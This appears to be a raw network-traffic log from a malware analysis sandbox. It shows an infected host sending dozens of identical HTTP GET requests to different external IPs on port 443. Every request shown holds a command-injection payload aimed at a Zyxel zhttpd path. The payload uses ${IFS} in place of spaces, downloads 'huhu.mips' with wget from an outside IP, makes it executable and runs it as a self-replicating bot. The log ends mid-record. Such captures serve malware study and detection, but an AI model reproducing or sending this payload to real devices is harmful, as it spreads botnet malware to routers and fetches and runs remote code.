                                      Jan 19, 2024 17:29:20.553486109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1619192.168.2.14505382.99.121.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544256926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1620192.168.2.1459294175.81.116.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544277906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1621192.168.2.143632885.23.29.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544320107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1622192.168.2.1444310178.156.203.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544382095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1623192.168.2.1440266128.175.139.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544399023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1624192.168.2.143597888.195.65.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544409037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1625192.168.2.1447300134.219.9.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544449091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1626192.168.2.1444522182.5.86.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544512033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1627192.168.2.1433760160.148.143.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544533968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1628192.168.2.1444742146.179.225.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544572115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1629192.168.2.1458774102.12.158.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544631958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1630192.168.2.145421096.178.37.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544631958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1631192.168.2.1448754158.109.92.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544682026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1632192.168.2.1434974121.229.187.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544714928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1633192.168.2.1455920189.92.168.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544743061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1634192.168.2.14391008.192.27.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544784069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1635192.168.2.143362678.197.118.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544836998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1636192.168.2.145452254.152.49.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544872999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1637192.168.2.144141660.91.86.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544915915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1638192.168.2.14482008.222.251.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544986010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1639192.168.2.1435834175.93.49.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544989109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1640192.168.2.1445464118.130.49.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.544986010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1641192.168.2.143347866.245.109.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545073032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1642192.168.2.144403441.105.225.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545075893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1643192.168.2.1454644143.146.121.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545095921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1644192.168.2.143540888.80.222.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545147896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1645192.168.2.144903457.213.108.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545197010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1646192.168.2.1450150149.104.157.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545264959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1647192.168.2.1439524186.198.24.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545274019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1648192.168.2.1434078198.243.170.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545320988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1649192.168.2.1458188166.164.230.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545351028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1650192.168.2.1439482150.116.45.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545384884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1651192.168.2.144613682.87.46.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545440912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1652192.168.2.143909049.233.2.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545450926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1653192.168.2.145477263.38.104.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545509100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1654192.168.2.1450036164.212.52.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545537949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1655192.168.2.144091695.21.104.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545564890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1656192.168.2.144515880.86.215.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545634985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1657192.168.2.144422844.122.94.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545650005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1658192.168.2.1437470170.42.108.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545675039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1659192.168.2.1448472128.246.27.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545701981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1660192.168.2.1435264178.39.147.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545728922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1661192.168.2.143811874.33.113.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545728922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1662192.168.2.1438944191.77.242.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545766115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1663192.168.2.1447738198.87.92.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545809984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1664192.168.2.1448574110.186.135.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545851946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1665192.168.2.1456656121.50.214.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545912981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1666192.168.2.144840059.2.191.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545922995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1667192.168.2.1435592109.204.87.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545947075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1668192.168.2.144495472.120.158.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.545994043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1669192.168.2.144721673.88.233.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546016932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1670192.168.2.143582872.31.219.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546053886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1671192.168.2.1460150206.249.127.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546120882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1672192.168.2.1457952125.136.14.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546138048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1673192.168.2.146068875.107.186.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546159983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1674192.168.2.1443472108.246.252.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546179056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1675192.168.2.1453410145.148.47.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546221972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1676192.168.2.144383049.241.25.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546288967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1677192.168.2.143790462.109.240.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546322107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1678192.168.2.145637614.198.115.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546346903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1679192.168.2.143791847.240.125.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546395063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1680192.168.2.1443276166.195.67.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546421051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1681192.168.2.14544065.54.46.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.546467066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1682192.168.2.145578013.93.230.18443
                                      TimestampBytes transferredDirectionData
